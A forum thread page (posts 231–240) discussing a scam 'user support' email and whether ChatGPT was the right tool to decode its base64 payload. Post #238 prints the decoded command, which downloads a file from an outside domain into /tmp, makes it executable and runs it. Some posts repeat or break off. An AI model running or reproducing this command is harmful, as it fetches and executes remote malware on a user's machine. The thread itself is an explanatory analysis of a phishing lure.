Why would you ask ChatGPT to tell you what a base64-encoded string is? Just base64 decode it! This blog post's "investigation" is worthless when it's just copy/pasting what a chat bot said. There is no reason to rely on a chat bot for this.
"Why use a calculator all the time? Just use pen and paper!" ChatGPT is the right tool here, because it does the job, and it's more versatile. And underneath the hood it most likely called a decoder anyways.
The scariest "user support" email I've received
231–240 of 267 posts
Re: The scariest "user support" email I've received
#232Earlier quoted context omitted.
IMO it's a fairly common ESL-phrasing for something like "thanks for your help"
If your idea of common ESL-phrasing is Indian scam center idioms perhaps.
Re: The scariest "user support" email I've received
#233Re: The scariest "user support" email I've received
#234Earlier quoted context omitted.
As a kid who was raised editing and tinkering memory blocks out of CONFIG.SYS, I've been watching this for a while when the GenZ-Mobile-Generation showed up and was not able to do the darnest things. I see with terror in my heart that the downward ride isn't yet over.
Can you grow your own food? Treat your own injuries? Build your own shelter? Repair your own appliances? If not, you're already much farther down this dependency funnel that you believe.
The idea is not to be hypergeneralist. What I observe - subjectively - is that we are losing whole generations of what used to be the 'nerdy IT/ham-radio/electronics-folks'. Sure, there is a small remnants with the makerscene, but that's mostly older people (beginning in their late teens).d
Re: The scariest "user support" email I've received
#235Earlier quoted context omitted.
"Why use a calculator all the time? Just use pen and paper!" ChatGPT is the right tool here, because it does the job, and it's more versatile. And underneath the hood it most likely called a decoder anyways.
ChatGPT failed at doing the job, and it was the wrong tool to use. It explained that it saves a file and executes it. That's a nothingburger, it was obvious it's going to execute some code. The actual value would have been showing what's in the executed file, but of course it didn't show that (since that would have required actually executing the code). Showing the contents of the file would have provided an exact an…
Re: The scariest "user support" email I've received
#236Why would you ask ChatGPT to tell you what a base64-encoded string is? Just base64 decode it! This blog post's "investigation" is worthless when it's just copy/pasting what a chat bot said. There is no reason to rely on a chat bot for this.
Re: The scariest "user support" email I've received
#237Earlier quoted context omitted.
As a kid who was raised editing and tinkering memory blocks out of CONFIG.SYS, I've been watching this for a while when the GenZ-Mobile-Generation showed up and was not able to do the darnest things. I see with terror in my heart that the downward ride isn't yet over.
Can you grow your own food? Treat your own injuries? Build your own shelter? Repair your own appliances? If not, you're already much farther down this dependency funnel that you believe.
Re: The scariest "user support" email I've received
#238Earlier quoted context omitted.
The "old fashioned" way was to post on an internet message board or internet chatroom and let someone else decode it.
In this case the old-fashioned way is to decode it yourself. It's a very short blob of base64, and if you don't recognize it, that doesn't matter, because the command explicitly passes it to `base64 -d`. Decoded: curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR This isn't exactly obfuscated. Download an executable file, make it…
I remember tons of "what's this JS/PHP blob do I found in my Wordpress site" back in the day that were generally more obfuscated than a single base64 pass
Re: The scariest "user support" email I've received
#239Why would you ask ChatGPT to tell you what a base64-encoded string is? Just base64 decode it! This blog post's "investigation" is worthless when it's just copy/pasting what a chat bot said. There is no reason to rely on a chat bot for this.
"Why use a calculator all the time? Just use pen and paper!" ChatGPT is the right tool here, because it does the job, and it's more versatile. And underneath the hood it most likely called a decoder anyways.
Re: The scariest "user support" email I've received
#240Earlier quoted context omitted.
I mean some people asked what "cat" is, then I remembered there was a time when I had no idea how to use mIRC, so whatever. In my defense though, I was REALLY young.
>In my defense though, I was REALLY young. No need to apologize, needing an excuse to lack knowledge is how we end up with people afraid to ask. I try to make it visible when I’m among juniors and there’s something I don’t know. I think showing the process of “I realize I miss some knowledge => here’s how I bridge the gap” might help against the current trend of going through the motions in the dark. It used to be th…
Yes!
There is no shame in ignorance. We are all, without exception, ignorant of more things than we're knowledgeable about. Shame should be reserved for remaining ignorant of things when it becomes clear that we would benefit from learning about them.